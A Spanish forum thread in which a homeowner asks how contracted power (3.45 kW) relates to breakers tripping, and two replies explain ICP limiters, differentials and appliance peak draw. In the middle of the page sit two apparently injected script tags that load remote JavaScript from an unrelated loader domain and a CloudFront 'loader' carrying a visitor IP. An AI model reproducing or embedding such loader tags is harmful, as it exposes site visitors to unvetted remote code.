Aclaración consumo hogar

A ver si me puede aclarar las cosas. Yo tengo contratado 3.45 Kw para la casa. Bien, si me explica qué significa esto mejor, porque igual tengo una idea equivocada. Es por lo siguiente. La secadora me consume 2.2 kw y la lavadora igual. ¿Cómo es posible que estando las 2 funcionando al mismo tiempo no haga saltar el diferencial de la casa?. ¿O es que no tiene nada que ver lo contratado con la potencia para que salten los plomillos?. Es al usar la lavadora + secadora + vitro o microondas... Cuando salta la luz. ¿Puede explicarme un poco los conceptos?.

¿Los 2.2 kw significa que en una hora consume esa potencia?. ¿Entonces cómo se sabe cuándo puede saltar los plomillos, según lo que tengas encendido?.

Gracias.

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B4C2B88A3-D078-4709-88AF-1E99A9C20F0D%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=51&ccid=M%EF%BF%BDlaga&ip=150.214.49.125"></script>

2 Respuestas

Respuesta

A ver si me puedo explicar correctamente; la potencia contratada viene regulada por el magnetotérmico general ( debe poner las siglas ICP, que significa interruptor de control de potencia ) que no es el diferencial (este debe ser de un amperaje superior al ICP, por ejemplo, un ICP de 15A debe tener asociado un diferencial de 25 o 40A).

Generalmente, los 2'2 Kw de la lavadora se consumen solo unos breves minutos (cuando tiene que calentar el agua); igualmente, los 2'2 Kw de la secadora se consumen cuando la tienes a la máxima potencia, y lo mismo con la vitrocerámica.

El ICP no es de respuesta rápida, osea que, aunque la suma de potencias supere su amperaje puntualmente, no se dispara; es al cabo de unos minutos sobrepasando bastante su amperaje cuando se dispara.

Respuesta

Por lo que me comenta doy por sentado que tiene en su casa magnetotérmicos o pías (no diferenciales. El diferencial es el que tiene un botón que dice "test" y este no salta por consumo sino por fugas de corriente)

Ahora le explico un poco el tema de las potencias:

Para empezar ha de tener en cuenta que las potencias que vienen reflejadas en las placas de características, se refieren como norma general a la potencia máxima que puede llegar a consumir un electrodoméstico. El consumo normalmente no suele ser constante ya que no es lo mismo que la lavadora esté haciendo un lavado que un centrifugado, y normalmente tiende a ser menor que el que consta en las características de cada aparato.

Le pongo un ejemplo claro: A usted en el manual de la vitro le dicen que el consumo es de 3 kW. Si pone todos los fogones y todos al máximo, consumirá esos 3kw pero si solo enciende uno y a una potencia media, posiblemente no le llegue a 700w, de modo que aunque ponga la secadora y la lavadora a la vez es probable que entre las dos no lleguen a los 4,4kw que sería la suma de ambas funcionando a plena potencia.

Por otro lado también está la potencia que puede soportar un magnetotérmico. En todas las instalaciones nuevas (al menos desde el 2002) la compañía obliga a la instalación de un ICP (interruptor de control de potencia) cuya función es la de cortar la luz cuando se sobrepasa la potencia contratada. Si usted tiene uno (es igual que un magnetotérmico solo que en el frontal viene rotulado ICP y es el primero de todos) ha de fijarse que sea de 15A que es lo que corresponde con lo que tiene contratado. De ser mayor, aguanta más potencia y seria otra de las razones por las que no saltaría ni aun funcionando lavadora y secadora a pleno rendimiento.

Y por último: al no ser la mayoría de electrodomésticos de consumo constante sino que varia dependiendo de varios factores, es muy difícil saber cuando va a saltar el magnetotérmico o los "plomillos" dependiendo de los aparatos que se pongan en marcha. Lo que si está claro es que se quedarán sin luz si ponen los de mayor consumo a funcionar al mismo tiempo.